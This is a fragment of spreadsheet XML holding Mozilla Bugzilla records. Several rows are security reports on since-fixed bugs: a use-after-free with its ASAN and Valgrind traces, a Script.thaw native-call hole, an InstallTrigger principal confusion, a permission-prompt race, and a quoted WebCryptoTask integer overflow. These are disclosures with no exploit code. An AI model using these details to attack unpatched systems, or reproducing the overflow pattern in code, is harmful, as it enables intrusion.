      <c r="H2487" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2487" t="inlineStr">
        <is>
          <t>Webtools Graveyard</t>
        </is>
      </c>
      <c r="J2487" t="inlineStr">
        <is>
          <t>Verbatim</t>
        </is>
      </c>
      <c r="K2487" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2487" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2487" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2487" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2487" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2487" t="inlineStr"/>
      <c r="Q2487" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2487" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2487" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2487" t="n">
        <v>1</v>
      </c>
      <c r="U2487" t="n">
        <v>0</v>
      </c>
      <c r="V2487" t="n">
        <v>6</v>
      </c>
      <c r="W2487" t="inlineStr">
        <is>
          <t>This started in an email but I wanted other people to be able to follow along so moving it to a bug.  Original email:
[...] I'll setup a demo soon and put a link on that page.  There are around a dozen pages, all can have the same template and once one is done I can merge it out to the others if needed.  We'd like to have something done before the summit so we can have it pretty for the next demo. :)
John:  Do you need more information from me to get started?</t>
        </is>
      </c>
      <c r="X2487" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2488">
      <c r="A2488" t="n">
        <v>1590857</v>
      </c>
      <c r="B2488" t="inlineStr">
        <is>
          <t>2019-10-23 12:06:32 -0700</t>
        </is>
      </c>
      <c r="C2488" t="inlineStr">
        <is>
          <t>`mach install` shouldn't ask "Re-install geckoview_example? (Y/n)"</t>
        </is>
      </c>
      <c r="D2488" t="inlineStr">
        <is>
          <t>2019-11-26 01:36:31 -0800</t>
        </is>
      </c>
      <c r="E2488" t="n">
        <v>1</v>
      </c>
      <c r="F2488" t="n">
        <v>1</v>
      </c>
      <c r="G2488" t="n">
        <v>7</v>
      </c>
      <c r="H2488" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2488" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J2488" t="inlineStr">
        <is>
          <t>Android Studio and Gradle Integration</t>
        </is>
      </c>
      <c r="K2488" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2488" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2488" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2488" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2488" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2488" t="inlineStr"/>
      <c r="Q2488" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R2488" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2488" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T2488" t="n">
        <v>1</v>
      </c>
      <c r="U2488" t="n">
        <v>0</v>
      </c>
      <c r="V2488" t="n">
        <v>5</v>
      </c>
      <c r="W2488" t="inlineStr">
        <is>
          <t>**STR**
  1. Do an Android build.
  2. Run `mach install`.
**Actual results**
The command asks, "Re-install geckoview_example? (Y/n)"?
**Expected results**
The command installs GVE without asking. If I didn't want to install the app, I wouldn't have run `mach install` :)</t>
        </is>
      </c>
      <c r="X2488" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2489">
      <c r="A2489" t="n">
        <v>747688</v>
      </c>
      <c r="B2489" t="inlineStr">
        <is>
          <t>2012-04-21 18:31:16 -0700</t>
        </is>
      </c>
      <c r="C2489" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsFrameList::FirstChild</t>
        </is>
      </c>
      <c r="D2489" t="inlineStr">
        <is>
          <t>2024-05-29 16:00:41 -0700</t>
        </is>
      </c>
      <c r="E2489" t="n">
        <v>1</v>
      </c>
      <c r="F2489" t="n">
        <v>1</v>
      </c>
      <c r="G2489" t="n">
        <v>3</v>
      </c>
      <c r="H2489" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2489" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2489" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2489" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2489" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2489" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2489" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2489" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2489" t="inlineStr">
        <is>
          <t>[asan][sg:critical][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q2489" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2489" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2489" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T2489" t="n">
        <v>1</v>
      </c>
      <c r="U2489" t="n">
        <v>0</v>
      </c>
      <c r="V2489" t="n">
        <v>42</v>
      </c>
      <c r="W2489" t="inlineStr">
        <is>
          <t>Created attachment 617267
Testcase
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.162 Safari/535.19
Steps to reproduce:
Tested on Aurora 20120421074909
http://hg.mozilla.org/releases/mozilla-aurora/rev/6f27de794daa
and Trunk 20120419154942
http://hg.mozilla.org/mozilla-central/rev/c861d58b7ade
ASAN stack::
==18828== ERROR: AddressSanitizer heap-use-after-free on address 0x7fdb84d6bd80 at pc 0x7fdbafbd1f54 bp 0x7fffecab7970 sp 0x7fffecab7968
READ of size 8 at 0x7fdb84d6bd80 thread T0
    #0 0x7fdbafbd1f54 in nsFrameList::FirstChild() const /usr/local/google/home/aarya/firefox/aurora-src/modules/zlib/src/inffast.c:0
    #1 0x7fdb8ac27660 in  
0x7fdb84d6bd80 is located 0 bytes inside of 16-byte region [0x7fdb84d6bd80,0x7fdb84d6bd90)
freed by thread T0 here:
    #0 0x410dd2 in free ??:0
    #1 0x7fdbafd55b96 in operator delete(void*) /usr/local/google/home/aarya/firefox/aurora-src/../../dist/include/mozilla/mozalloc.h:253
    #2 0x2000007fdbaf8308
previously allocated by thread T0 here:
    #0 0x410e92 in malloc ??:0
    #1 0x7fdbb5469450 in moz_xmalloc /usr/local/google/home/aarya/firefox/aurora-src/memory/mozalloc/mozalloc.cpp:103
==18828== ABORTING
Stats: 162M malloced (161M for red zones) by 345347 calls
Stats: 43M realloced by 19180 calls
Stats: 131M freed by 228972 calls
Stats: 0M really freed by 0 calls
Stats: 356M (91189 full pages) mmaped in 89 calls
  mmaps   by size class: 8:262128; 9:57337; 10:20475; 11:16376; 12:3072; 13:2048; 14:1536; 15:384; 16:704; 17:224; 18:128; 19:56; 20:16;
  mallocs by size class: 8:254495; 9:49981; 10:18431; 11:15427; 12:2334; 13:1818; 14:1464; 15:381; 16:639; 17:199; 18:116; 19:49; 20:13;
  frees   by size class: 8:154593; 9:40949; 10:15619; 11:12669; 12:1671; 13:991; 14:1276; 15:335; 16:566; 17:185; 18:63; 19:45; 20:10;
  rfrees  by size class:
Stats: malloc large: 377 small slow: 1901
Shadow byte and word:
  0x1ffb709ad7b0: fd
  0x1ffb709ad7b0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ffb709ad790: fd fd fd fd fd fd fd fd
  0x1ffb709ad798: fd fd fd fd fd fd fd fd
  0x1ffb709ad7a0: fa fa fa fa fa fa fa fa
  0x1ffb709ad7a8: fa fa fa fa fa fa fa fa
=&gt;0x1ffb709ad7b0: fd fd fd fd fd fd fd fd
  0x1ffb709ad7b8: fd fd fd fd fd fd fd fd
  0x1ffb709ad7c0: fa fa fa fa fa fa fa fa
  0x1ffb709ad7c8: fa fa fa fa fa fa fa fa
  0x1ffb709ad7d0: fd fd fd fd fd fd fd fd
Valgrind stack::
==19089== Invalid read of size 8
==19089==    at 0x85360B8: nsFrameList::FirstChild() const (nsFrameList.h:246)
==19089==    by 0x862C43C: nsOverflowContinuationTracker::Finish(nsIFrame*) (nsContainerFrame.cpp:1724)
==19089==    by 0x861FCF9: nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) (nsBlockReflowContext.cpp:333)
==19089==    by 0x8615899: nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) (nsBlockFrame.cpp:3202)
==19089==    by 0x8614071: nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) (nsBlockFrame.cpp:2511)
==19089==    by 0x8612C93: nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) (nsBlockFrame.cpp:2022)
==19089==    by 0x8610E7B: nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) (nsBlockFrame.cpp:1071)
==19089==    by 0x862A824: nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) (nsContainerFrame.cpp:941)
==19089==    by 0x862774C: nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) (nsColumnSetFrame.cpp:704)
==19089==    by 0x8628575: nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) (nsColumnSetFrame.cpp:1066)
==19089==    by 0x861FC1B: nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) (nsBlockReflowContext.cpp:295)
==19089==    by 0x8615899: nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) (nsBlockFrame.cpp:3202)
==19089==  Address 0x1de137f0 is 0 bytes inside a block of size 16 free'd
==19089==    at 0x4C2779F: free (vg_replace_malloc.c:427)
==19089==    by 0x69DF1A3: moz_free (mozalloc.cpp:81)
==19089==    by 0x862BA11: nsContainerFrame::RemovePropTableFrame(nsPresContext*, nsIFrame*, mozilla::FramePropertyDescriptor const*) (mozalloc.h:253)
==19089==    by 0x862B377: nsContainerFrame::StealFrame(nsPresContext*, nsIFrame*, bool) (nsContainerFrame.cpp:1226)
==19089==    by 0x861B7DA: nsBlockFrame::StealFrame(nsPresContext*, nsIFrame*, bool) (nsBlockFrame.cpp:5654)
==19089==    by 0x862B827: nsContainerFrame::DeleteNextInFlowChild(nsPresContext*, nsIFrame*, bool) (nsContainerFrame.cpp:1372)
==19089==    by 0x861BC1B: nsBlockFrame::DeleteNextInFlowChild(nsPresContext*, nsIFrame*, bool) (nsBlockFrame.cpp:5742)
==19089==    by 0x861FD2B: nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) (nsBlockReflowContext.cpp:335)
==19089==    by 0x8615899: nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) (nsBlockFrame.cpp:3202)
==19089==    by 0x8614071: nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) (nsBlockFrame.cpp:2511)
==19089==    by 0x8612C93: nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) (nsBlockFrame.cpp:2022)
==19089==    by 0x8610E7B: nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) (nsBlockFrame.cpp:1071)
==19089==</t>
        </is>
      </c>
      <c r="X2489" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2490">
      <c r="A2490" t="n">
        <v>815352</v>
      </c>
      <c r="B2490" t="inlineStr">
        <is>
          <t>2012-11-26 13:58:50 -0800</t>
        </is>
      </c>
      <c r="C2490" t="inlineStr">
        <is>
          <t>Make it possible to open the downloads view in the Library window to be opened up inside a tab</t>
        </is>
      </c>
      <c r="D2490" t="inlineStr">
        <is>
          <t>2013-11-12 00:57:07 -0800</t>
        </is>
      </c>
      <c r="E2490" t="n">
        <v>1</v>
      </c>
      <c r="F2490" t="n">
        <v>1</v>
      </c>
      <c r="G2490" t="n">
        <v>2</v>
      </c>
      <c r="H2490" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2490" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2490" t="inlineStr">
        <is>
          <t>Downloads Panel</t>
        </is>
      </c>
      <c r="K2490" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2490" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2490" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2490" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2490" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2490" t="inlineStr">
        <is>
          <t>[appcoast]</t>
        </is>
      </c>
      <c r="Q2490" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2490" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2490" t="inlineStr">
        <is>
          <t>Firefox 20</t>
        </is>
      </c>
      <c r="T2490" t="n">
        <v>1</v>
      </c>
      <c r="U2490" t="n">
        <v>2</v>
      </c>
      <c r="V2490" t="n">
        <v>57</v>
      </c>
      <c r="W2490" t="inlineStr">
        <is>
          <t>We need this in order to be able to support opening this tab when the user clicks Show All Downloads in a private window in per-window private browsing builds.
This is a small subset of the work involved in bug 697359, and does not involve making the other panes in the Library window to work at all.  In fact we don't even want those panes to be visible for the purposes of this bug.</t>
        </is>
      </c>
      <c r="X2490" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2491">
      <c r="A2491" t="n">
        <v>221526</v>
      </c>
      <c r="B2491" t="inlineStr">
        <is>
          <t>2003-10-07 15:27:24 -0700</t>
        </is>
      </c>
      <c r="C2491" t="inlineStr">
        <is>
          <t>JS Script.thaw is a security hole</t>
        </is>
      </c>
      <c r="D2491" t="inlineStr">
        <is>
          <t>2011-08-05 22:35:00 -0700</t>
        </is>
      </c>
      <c r="E2491" t="n">
        <v>1</v>
      </c>
      <c r="F2491" t="n">
        <v>1</v>
      </c>
      <c r="G2491" t="n">
        <v>3</v>
      </c>
      <c r="H2491" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2491" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2491" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2491" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2491" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2491" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2491" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2491" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2491" t="inlineStr"/>
      <c r="Q2491" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2491" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2491" t="inlineStr">
        <is>
          <t>mozilla1.5final</t>
        </is>
      </c>
      <c r="T2491" t="n">
        <v>1</v>
      </c>
      <c r="U2491" t="n">
        <v>0</v>
      </c>
      <c r="V2491" t="n">
        <v>19</v>
      </c>
      <c r="W2491" t="inlineStr">
        <is>
          <t>Script.thaw deserializes a script from a string.  You can then run the script. 
A savvy attacker who knows JS bytecode and engine internals, and the target
machine architecture, can call a native function!
Patch in a second.
/be</t>
        </is>
      </c>
      <c r="X2491" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2492">
      <c r="A2492" t="n">
        <v>493601</v>
      </c>
      <c r="B2492" t="inlineStr">
        <is>
          <t>2009-05-18 12:05:57 -0700</t>
        </is>
      </c>
      <c r="C2492" t="inlineStr">
        <is>
          <t>Investigate crash involving Flash module unloading</t>
        </is>
      </c>
      <c r="D2492" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E2492" t="n">
        <v>1</v>
      </c>
      <c r="F2492" t="n">
        <v>1</v>
      </c>
      <c r="G2492" t="n">
        <v>6</v>
      </c>
      <c r="H2492" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2492" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2492" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K2492" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2492" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2492" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2492" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2492" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2492" t="inlineStr">
        <is>
          <t>[sg:critical?] PoC removed at request of reporter</t>
        </is>
      </c>
      <c r="Q2492" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2492" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2492" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T2492" t="n">
        <v>1</v>
      </c>
      <c r="U2492" t="n">
        <v>0</v>
      </c>
      <c r="V2492" t="n">
        <v>53</v>
      </c>
      <c r="W2492" t="inlineStr">
        <is>
          <t>Attila Suszter reported this crash and proof-of-concept to security@m.o..  It appears to be caused by navigating the page and therefore unloading the Flash player while a dialog presented by the Flash player is still visible.
It helped me to increase the meta-refresh time in index.html to a higher number so the dialog has time to appear.  I don't have a Windows debug build available, so I wasn't able to provide more information about the call stack leading to the crash.  I'll attach the PoC momentarily.
Possibly related to bug 470487?</t>
        </is>
      </c>
      <c r="X2492" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2493">
      <c r="A2493" t="n">
        <v>887098</v>
      </c>
      <c r="B2493" t="inlineStr">
        <is>
          <t>2013-06-25 19:26:45 -0700</t>
        </is>
      </c>
      <c r="C2493" t="inlineStr">
        <is>
          <t>InstallTrigger can use the wrong principal when validating URI loads</t>
        </is>
      </c>
      <c r="D2493" t="inlineStr">
        <is>
          <t>2024-05-30 08:04:49 -0700</t>
        </is>
      </c>
      <c r="E2493" t="n">
        <v>1</v>
      </c>
      <c r="F2493" t="n">
        <v>1</v>
      </c>
      <c r="G2493" t="n">
        <v>6</v>
      </c>
      <c r="H2493" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2493" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2493" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K2493" t="inlineStr">
        <is>
          <t>22 Branch</t>
        </is>
      </c>
      <c r="L2493" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2493" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2493" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2493" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2493" t="inlineStr">
        <is>
          <t>[adv-main23+][adv-esr1708+]</t>
        </is>
      </c>
      <c r="Q2493" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2493" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2493" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T2493" t="n">
        <v>1</v>
      </c>
      <c r="U2493" t="n">
        <v>0</v>
      </c>
      <c r="V2493" t="n">
        <v>33</v>
      </c>
      <c r="W2493" t="inlineStr">
        <is>
          <t>Created attachment 767559
pdffspoc.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 (Beta/Release)
Build ID: 20130511120803
Steps to reproduce:
I held a reference to the eval function of another window before loading the new pdf.js implementation in that window, and then used that reference to show that components/extensions implementing their own security checks can potentially allow unsafe actions to be performed from content.
Actual results:
Since the pdf.js implementation has access to resource:// and file:// URLs, it was possible to use InstallTrigger to issue a warning to the error console/firebug demonstrating that it actually uses the principal of the new pdf viewer when performing its own security checks which happen here:
http://mxr.mozilla.org/mozilla-central/source/toolkit/mozapps/extensions/content/extensions-content.js#152
This is a potential concern in other javascript components that use the document of the window they're accessible from to perform checks against URLs before performing sensitive actions, and could also potentially be used to bypass the same origin policy and other all around nastiness.  I had some success before firefox 21 installing webapps for other domains with this technique but didnt see it as a very big concern since access to navigator.mozApps.mgmt has since been properly handled which means that any DOMRequest object returned from such an install will be a cross compartment wrapper and deny access.  In this instance I showed that InstallTrigger gains local filesystem access in the warning that results.
Expected results:
I should have received the normal exception that results from passing a file:/// URL to InstallTrigger.install from content.  In this instance this is the fault of the InstallTrigger object so I'm sure there's other code that this should raise concerns about.</t>
        </is>
      </c>
      <c r="X2493" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2494">
      <c r="A2494" t="n">
        <v>1248329</v>
      </c>
      <c r="B2494" t="inlineStr">
        <is>
          <t>2016-02-14 21:50:32 -0800</t>
        </is>
      </c>
      <c r="C2494" t="inlineStr">
        <is>
          <t>Requesting permissions in short succession can lead to the microphone icon displayed for an unrelated notification</t>
        </is>
      </c>
      <c r="D2494" t="inlineStr">
        <is>
          <t>2017-01-05 09:08:28 -0800</t>
        </is>
      </c>
      <c r="E2494" t="n">
        <v>1</v>
      </c>
      <c r="F2494" t="n">
        <v>1</v>
      </c>
      <c r="G2494" t="n">
        <v>2</v>
      </c>
      <c r="H2494" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2494" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2494" t="inlineStr">
        <is>
          <t>Site Permissions</t>
        </is>
      </c>
      <c r="K2494" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L2494" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2494" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2494" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2494" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2494" t="inlineStr">
        <is>
          <t>[adv-main47+]</t>
        </is>
      </c>
      <c r="Q2494" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2494" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2494" t="inlineStr">
        <is>
          <t>Firefox 47</t>
        </is>
      </c>
      <c r="T2494" t="n">
        <v>1</v>
      </c>
      <c r="U2494" t="n">
        <v>0</v>
      </c>
      <c r="V2494" t="n">
        <v>15</v>
      </c>
      <c r="W2494" t="inlineStr">
        <is>
          <t>Created attachment 8719379
demo-6194b06b95d2c580b7.html
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.6.1
Build ID: 20160214081214
Steps to reproduce:
I created a web page to request as many permissions as possible within a short span of time. (Geolocation, pointer lock, microphone and camera access, notifications.) Demo attached.
Actual results:
Under some conditions, the notifications dialogs have the wrong icon, e.g. microphone icon for notifications or (more worryingly) for geolocation.
This is probably a race condition. If it can be controlled, it could lead to a user "consenting" to the wrong permission. (Marking as Security bug out of caution for now, feel free to remove flag.)
The boxes also flash past in a way that indicates that sometimes one permission cancels display of another.
Expected results:
Notifications boxes should appear in quick succession (but do not replace each other) or form a single stack. They should also have the correct icons.</t>
        </is>
      </c>
      <c r="X2494" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2495">
      <c r="A2495" t="n">
        <v>1413841</v>
      </c>
      <c r="B2495" t="inlineStr">
        <is>
          <t>2017-11-02 02:52:34 -0700</t>
        </is>
      </c>
      <c r="C2495" t="inlineStr">
        <is>
          <t>WebCryptoTask integer overflow</t>
        </is>
      </c>
      <c r="D2495" t="inlineStr">
        <is>
          <t>2018-11-05 14:10:07 -0800</t>
        </is>
      </c>
      <c r="E2495" t="n">
        <v>1</v>
      </c>
      <c r="F2495" t="n">
        <v>1</v>
      </c>
      <c r="G2495" t="n">
        <v>3</v>
      </c>
      <c r="H2495" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2495" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2495" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2495" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2495" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2495" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2495" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2495" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2495" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2495" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2495" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2495" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T2495" t="n">
        <v>1</v>
      </c>
      <c r="U2495" t="n">
        <v>0</v>
      </c>
      <c r="V2495" t="n">
        <v>49</v>
      </c>
      <c r="W2495" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
Steps to reproduce:
AesTask:: DoCrypt() in dom/crypto/WebCryptoTask.cpp
potential integer overflow. if dataLen is bigger than or equal to 0xfffffff0, maxLen would overflow, so mResult's length would be a small integer. then calling PK11_Encrypt or PK11_Decrypt could cause writing beyond mResult's buffer
    uint32_t dataLen = mData.Length();
    uint32_t maxLen = dataLen + 16;
    if (!mResult.SetLength(maxLen, fallible)) {
      return NS_ERROR_DOM_UNKNOWN_ERR;
    }
    uint32_t outLen = 0;
    // Perform the encryption/decryption
    if (mEncrypt) {
      rv = MapSECStatus(PK11_Encrypt(symKey.get(), mMechanism, &amp;param,
                                     mResult.Elements(), &amp;outLen,
                                     mResult.Length(), mData.Elements(),
                                     mData.Length()));
    } else {
      rv = MapSECStatus(PK11_Decrypt(symKey.get(), mMechanism, &amp;param,
                                     mResult.Elements(), &amp;outLen,
                                     mResult.Length(), mData.Elements(),
                                     mData.Length()));
    }</t>
        </is>
      </c>
      <c r="X2495" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2496">
      <c r="A2496" t="n">
        <v>682249</v>
      </c>
      <c r="B2496" t="inlineStr">
        <is>
          <t>2011-08-26 03:54:55 -0700</t>
        </is>
      </c>
      <c r="C2496" t="inlineStr">
        <is>
          <t>Set up compatibility bump for Thunderbird 6.0 to 7.0</t>
        </is>
      </c>
      <c r="D2496" t="inlineStr">
        <is>
          <t>2016-02-04 14:48:56 -0800</t>
        </is>
      </c>
      <c r="E2496" t="n">
        <v>1</v>
      </c>
      <c r="F2496" t="n">
        <v>1</v>
      </c>
      <c r="G2496" t="n">
        <v>6</v>
      </c>
      <c r="H2496" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2496" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J2496" t="inlineStr">
        <is>
          <t>Compatibility Tools</t>
        </is>
      </c>
      <c r="K2496" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2496" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2496" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2496" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2496" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
